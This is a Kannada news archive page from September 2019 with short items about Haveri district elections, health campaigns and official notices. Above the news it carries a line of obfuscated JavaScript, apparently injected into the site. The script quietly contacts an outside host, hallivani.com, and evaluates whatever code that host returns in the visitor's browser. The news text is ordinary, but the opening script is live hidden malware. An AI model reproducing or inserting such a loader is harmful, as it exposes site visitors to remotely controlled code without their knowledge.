;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//hallivani.com/8jju21px/cache/cache.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

Month: September 2019

ಯುಟಿಪಿ ಕಾಮಗಾರಿ ಅವ್ಯವಹಾರ ತನಿಖೆಗೆ ಸರ್ಕಾರಕ್ಕೆ ಶಿಫಾರಸ್ಸು: ಜಿ.ಪಂ.ಅಧ್ಯಕ್ಷ ಎಸ್.ಕೆ.ಕರಿಯಣ್ಣನವರ

ಹಾವೇರಿ: ತುಂಗಾ ಮೇಲ್ದಂಡೆ ಯೋಜನೆಯಡಿ ಚಿಕ್ಕೇರೂರು ಭಾಗದಲ್ಲಿ ಕಿರುಗಾಲುವೆ ನಿರ್ಮಾಣ ಮಾಡದೆ ಸಾವಿರಾರು ಎಕರೆ ನೀರು ಹರಿಸಲಾಗದೆ ರೈತರು ತೀವ್ರ…

ಅ.2ರಂದು ಅರ್ಥಪೂರ್ಣವಾಗಿ ಗಾಂಧಿ ಜಯಂತಿ ಆಚರಿಸಲು ಜಿಲ್ಲಾಧಿಕಾರಿ ಕೃಷ್ಣ ಬಾಜಪೇಯಿ ಸೂಚನೆ

ಹಾವೇರಿ: ಮಹಾತ್ಮಗಾಂಧೀಜಿ ಹಾಗೂ ಲಾಲ್‍ಬಹದ್ದೂರ ಶಾಸ್ತ್ರೀ ಅವರ ಜಯಂತಿಯನ್ನು ಅಕ್ಟೋಬರ್ 2 ರಂದು ಅರ್ಥಪೂರ್ಣವಾಗಿ ಆಚರಿಸಲು ವಿವಿಧ ಇಲಾಖಾ ಅಧಿಕಾರಿಗಳು…

ವೋಟರ್ ಹೆಲ್ಪ್‍ಲೈನ್ ಆ್ಯಪ್ ಬಗ್ಗೆ ವ್ಯಾಪಕ ಜಾಗೃತಿಗೆ ಕಾಲೇಜು ಪ್ರಾಚಾರ್ಯರಿಗೆ ಸೂಚನೆ: ಜಿಲ್ಲಾಧಿಕಾರಿ ಕೃಷ್ಣ ಬಾಜಪೇಯಿ

ಹಾವೇರಿ: ಮತದಾರರ ಪಟ್ಟಿಯಲ್ಲಿ ಹೆಸರು ಸೇರ್ಪಡೆ, ಮಾರ್ಪಾಡು, ತಿದ್ದುಪಡಿ ಮಾಡಿಕೊಳ್ಳಲು ವೋಟರ್ ಹೆಲ್ಪ್‍ಲೈನ್ ಆಪ್ ಬಳಸಿ ಪ್ರತಿ ಮತದಾರನು ಸ್ವಯಂ…

ನಗರ ಹಾಗೂ ಪಟ್ಟಣ ಪ್ರದೇಶದ ವಿವಿಧ ಅಂಗಡಿಗಳ ಮೇಲೆ ದಾಳಿ ರೂ.4650 ದಂಡ ವಸೂಲಿ

ಹಾವೇರಿ: ರಾಷ್ಟ್ರೀಯ ತಂಬಾಕು ನಿಯಂತ್ರಣ ಕಾರ್ಯಕ್ರಮದಡಿ ಜಿಲ್ಲಾ ತಂಬಾಕು ನಿಯಂತ್ರಣ ಕೋಶ ಹಾಗೂ ವಿವಿಧ ಅಧಿಕಾರಿಗಳನ್ನೊಳಗೊಂಡ ತಂಡ ರಾಣೇಬೆನ್ನೂರು ನಗರ,…

ಬೀದಿ ಬದಿ ವ್ಯಾಪಾರಸ್ಥರ ಅಂತಿಮ ಮತದಾರರ ಪಟ್ಟಿ ಪ್ರಕಟ

ಹಾವೇರಿ: ನಗರಸಭೆ ವ್ಯಾಪ್ತಿಯಲ್ಲಿ ಬೀದಿ ವ್ಯಾಪಾರಸ್ಥರನ್ನು ಸಮೀಕ್ಷೆ ಮುಖಾಂತರ ಗುರುತಿಸಲಾಗಿದ್ದು, ಗುರುತಿನ ಪತ್ರಗಳನ್ನು ನೀಡಲಾಗಿದೆ. ಸದರಿ ಬೀದಿ ಬದಿ ವ್ಯಾಪಾರಸ್ಥರ…

ಬಾಲ ಶಕ್ತಿ, ಬಾಲ ಕಲ್ಯಾಣ ಪುರಸ್ಕಾರ ಪ್ರಶಸ್ತಿಗೆ ಅರ್ಜಿ ಸಲ್ಲಿಸಲು ಅವಧಿ ವಿಸ್ತರಣೆ

ಹಾವೇರಿ: ಅಸಾಧರಣ ಸಾಧನೆ ಮಾಡಿದ ಮಕ್ಕಳಿಗೆ ನೀಡಲಾಗುವ ಬಾಲ ಶಕ್ತಿ ಪುರಸ್ಕಾರ ಮತ್ತು ಮಕ್ಕಳ ಕಲ್ಯಾಣ ಕ್ಷೇತ್ರದಲ್ಲಿ ಸೇವೆ ಸಲ್ಲಿಸಿದ…

ಸ್ವಯಂ ಪ್ರೇರಿತರಾಗಿ ಎಲ್ಲರೂ ರಕ್ತದಾನ ಮಾಡಬೇಕು: ಡಾ.ರಾಜೇಂದ್ರ ದೊಡ್ಡಮನಿ

ಹಾವೇರಿ: ರಕ್ತದಾನ ಶ್ರೇಷ್ಠದಾನವಾಗಿದೆ. ರಕ್ತದಾನದಿಂದ ಒಂದು ಜೀವ ಉಳಿಸಬಹುದಾಗಿದೆ ಎಂದು ಎಂದು ಜಿಲ್ಲಾ ಆರೋಗ್ಯ ಮತ್ತು ಕುಟುಂಬ ಕಲ್ಯಾಣ ಅಧಿಕಾರಿ…

ಅನಾಥ ಹಸುಗೂಸಿಗೆ ನಾಮಕರಣಮಾಡಿದ ಜಿಲ್ಲಾಧಿಕಾರಿ ಕೃಷ್ಣ ಬಾಜಪೇಯಿ

ಹಾವೇರಿ: ನಗರದ ಸ್ವಾಧಾರ ಸ್ವಯಂ ಸೇವಾ ಕೇಂದ್ರದಲ್ಲಿ ಆಶ್ರಯಪಡೆದ ತಾಯಿಯೋರ್ವರಿಗೆ ಜನಿಸಿದ ಮಗುವಿಗೆ ಜಿಲ್ಲಾಧಿಕಾರಿ ಕೃಷ್ಣ ಬಾಜಪೇಯಿ ಅವರು ಸಮೃದ್ಧಿ…

ಆಯೋಗದ ವೋಟರ್ ಹೆಲ್ಪ್‍ಲೈನ್ ಆ್ಯಪ್ ಬಳಿಸಿ ಸ್ವಯಂ ಪರಿಷ್ಕರಣೆಗೆ ಜಿಲ್ಲಾಧಿಕಾರಿ ಕೃಷ್ಣ ಬಾಜಪೇಯಿ ಮನವಿ

ಹಾವೇರಿ: ಮತದಾರರ ಪಟ್ಟಿಯಲ್ಲಿ ತಮ್ಮ ಹೆಸರುಗಳನ್ನು ಪರಿಷ್ಕರಣೆಗೆ ಭಾರತ ಚುನಾವಣಾ ಆಯೋಗದ ಹೊಸ ಆ್ಯಪ್ (Voter Helpline’’ Mobile App)…

ಸಮಾಜದಲ್ಲಿ ಎಲ್ಲರಿಗೂ ಬದುಕುವ ಹಕ್ಕಿದೆ: ನ್ಯಾಯಾಧೀಶೆ ಲಕ್ಷ್ಮೀ ಎನ್.ಗರಗ

ಹಾವೇರಿ: ಸಮಾಜದಲ್ಲಿ ಎಲ್ಲರಿಗೂ ಬದುಕುವ ಹಕ್ಕಿದೆ, ಎಲ್ಲರೂ ಗೌರವಯುತವಾಗಿ ಬದುಕುವುದು ಮುಖ್ಯ ಎಂದು  ಎಂದು ಪ್ರಧಾನ ಸಿವ್ಹಿಲ್ ನ್ಯಾಯಾಧೀಶೆ ಲಕ್ಷ್ಮೀ…

ಹೈನುಗಾರಿಕೆ, ಎರೆಹುಳು ಗೊಬ್ಬರ ತಯಾರಿಕೆ ತರಬೇತಿಗೆ ಅರ್ಜಿ ಆಹ್ವಾನ

ಹಾವೇರಿ: ದೇವಗಿರಿಯಲ್ಲಿರುವ ವಿಜಯಾ ಬ್ಯಾಂಕ ಸ್ವ ಉದ್ಯೋಗ ತರಬೇತಿ ಸಂಸ್ಥೆ ವಿಬ್‍ಸೆಟಿಯಲ್ಲಿ ಹಾವೇರಿ ಜಿಲ್ಲೆಯ ನಿರೂದ್ಯೋಗಿ ಯುವಕ/ಯುವತಿಯರಿಗೆ ಹೈನುಗಾರಿಕೆ ಮತ್ತು…

ಪೋಲಿಯೋ ಲಸಿಕೆ ಕುರಿತು ಸಾಮಾಜಿಕ ಜಾಲತಾಣಗಳಲ್ಲಿ ಹರಡಿರುವ ಸುಳ್ಳು ವದಂತಿಗೆ ಕಿವಿ ಕೊಡಬೇಡಿ: -ಡಿ.ಎಚ್.ಓ. ಡಾ.ರಾಜೇಂದ್ರ ದೊಡ್ಡಮನಿ

ಹಾವೇರಿ: ಸಾಮಾಜಿಕ ಜಾಲತಾಣಗಳಲ್ಲಿ ಕಳೆದ ಒಂದು ಕಳೆದ ಒಂದು ವಾರದಿಂದ ಪೋಲಿಯೋ ಲಸಿಕೆಯಲ್ಲಿ ವೈರಸ್ ಬೆರೆತಿರುವುದರಿಂದ ಯಾರೂ ಪೋಲಿಯೋ ಹಾಕಿಸಬಾರದು…

ಹಿರೇಕೆರೂರು, ರಾಣೇಬೆನ್ನೂರು ವಿಧಾನಸಭಾ ಕ್ಷೇತ್ರಗಳಿಗೆ ಉಪ ಚುನಾವಣೆ: ಜಿಲ್ಲೆಯಲ್ಲಿ ಶನಿವಾರದಿಂದಲೇ ನೀತಿ ಸಂಹಿತೆ ಜಾರಿ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯ ರಾಣೇಬೆನ್ನೂರು ಹಾಗೂ ಹಿರೇಕೆರೂರು ವಿಧಾನಸಭಾ ಕ್ಷೇತ್ರಕ್ಕೆ ಉಪ ಚುನಾವಣೆ ಘೋಷಣೆಯಾಗಿದ್ದು, ಸೆ 23ರ ಸೋಮವಾರದಿಂದ ಅಧಿಸೂಚನೆ ಹೊರಡಿಸಲಾಗುವುದು….

ಆಯುಷ್ಮಾನ್ ಭಾರತ, ಆರೋಗ್ಯ ಕರ್ನಾಟಕ ಯೋಜನೆ ಲಾಭ ಎಲ್ಲರಿಗೂ ತಲುಪಲಿ: ಜಿಲ್ಲಾಧಿಕಾರಿ ಕೃಷ್ಣ ಬಾಜಪೇಯಿ

ಹಾವೇರಿ: ಆಯುಷ್ಮಾನ ಭಾರತ, ಆರೋಗ್ಯ ಕರ್ನಾಟಕ ಯೋಜನೆಯು ಕೇಂದ್ರ ಸರ್ಕಾರದ ಮಹತ್ವಾಕಾಂಕ್ಷಿ ಯೋಜನೆಯಾಗಿದೆ. ಎಲ್ಲರೂ ಈ ಯೋಜನೆಯ ಸದುಪಯೋಗ ಪಡೆದುಕೊಳ್ಳಬೇಕು…

ರಾಜ್ಯದ 15 ವಿಧಾನಸಭಾ ಕ್ಷೇತ್ರಗಳಿಗೆ ಅಕ್ಟೋಬರ್‌ 21ಕ್ಕೆ ಉಪಚುನಾವಣೆ ಘೋಷಣೆ

ನವದೆಹಲಿ: ಮಹಾರಾಷ್ಟ್ರ ಹಾಗೂ ಹರ್ಯಾಣ ವಿಧಾನಸಭಾ ಕ್ಷೇತ್ರಗಳಿಗೆ ಕೇಂದ್ರ ಚುನಾವಣಾ ಆಯೋಗ ದಿನಾಂಕ ಘೋಷಿಸಿದ ಬೆನ್ನಲ್ಲೇ ಕರ್ನಾಟಕದ 15 ಅನರ್ಹ…

ಅಪ್ರಾಪ್ತ ಮಕ್ಕಳ ಮೇಲೆ ಲೈಂಗಿಕ ದೌರ್ಜನ್ಯ ನಡೆಯುತ್ತಿರುವುದು ವಿಷಾದರಕ ಸಂಗತಿ: ನ್ಯಾಯಾಧೀಶ ಕಿರಣ್ ಕಿಣಿ

ಹಾವೇರಿ: ಸಮಾಜದಲ್ಲಿ ಅಪ್ರಾಪ್ತ ಮಕ್ಕಳ ಮೇಲೆ ಲೈಂಗಿಕ ದೌರ್ಜನ್ಯಗಳು ನಡೆಯುತ್ತಿರುವುದು ವಿಷಾದಕರ ಸಂಗತಿಯಾಗಿದೆ. ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿ  ಪ್ರತಿ ಹೆಣ್ಣು ಮಕ್ಕಳಿಗೆ…

ಮಗುವಿಗೆ ಅಕ್ಷರ ಜ್ಞಾನದೊಂದಿಗೆ ಜೀವನದ ಮೌಲ್ಯಗಳನ್ನು ಕಲಿಸುವ ಜವಾಬ್ದಾರಿ ಶಿಕ್ಷಕರ ಮೇಲಿದೆ: ಬಸವಶಾಂತಲಿಂಗ ಶ್ರೀ

ಹಾವೇರಿ: ಪ್ರಾಥಮಿಕ ಶಿಕ್ಷಣ ಮಗುವಿನ ಜೀವನದ ತಳಪಾಯವಾಗಿದ್ದು, ಅಕ್ಷರ ಜ್ಞಾನದೊಂದಿಗೆ ಜೀವನದ ಮೌಲ್ಯಗಳನ್ನು ಕಲಿಸುವ ಜವಾಬ್ದಾರಿ ಶಿಕ್ಷಕರ ಮೇಲೆ ಇದೆ…

ಕ್ರೀಡಾ ಉತ್ತೇಜನಕ್ಕೆ ಸರ್ಕಾರದಿಂದ ಹಲವು ಸೌಲಭ್ಯ: ಶಾಸಕ ನೆಹರು ಓಲೇಕಾರ

ಹಾವೇರಿ: ಕ್ರೀಡಾ ಉತ್ತೇಜನಕ್ಕೆ ಸರ್ಕಾರದಿಂದ ಹಲವು ಸೌಲಭ್ಯಗಳನ್ನು ನೀಡಲಾಗುತ್ತಿದ್ದು, ಈ ಸೌಲಭ್ಯಗಳನ್ನು ಸಮರ್ಪಕವಾಗಿ ಬಳಸಿಕೊಂಡು ರಾಜ್ಯ ಮತ್ತು ಅಂತರಾಷ್ಟ್ರೀಯ ಮಟ್ಟದಲ್ಲಿ…